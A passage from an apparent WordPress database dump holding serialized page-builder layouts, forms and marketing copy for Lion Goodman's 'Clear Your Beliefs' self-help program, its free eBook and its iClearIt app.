hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1129, 1614, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1425:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<p style="font-size: 20px;"><b>The <em>Clear Your Beliefs</em> Program… and  How and Why…</b></p>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works So Well</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2708:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1381, 1809, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:88:"[su_posts template="templates/single-post.php" post_type="attachment" post_status="any"]";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1369:"<div class="three-container">[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button">	<input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1827:"<div class="three-container">[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]<center><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1177:"<div class="three-container">\n	[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p><form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1131, 1615, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1471:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<p style="font-size: 1.1em; margin-left: -10px;"><b>The <em>Clear Your Beliefs</em> Program… and  How and Why…</b></p>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<p style="font-size: 1.1em; margin-left: -10px;"><b>How and Why It Works So Well</b></p>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2708:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" 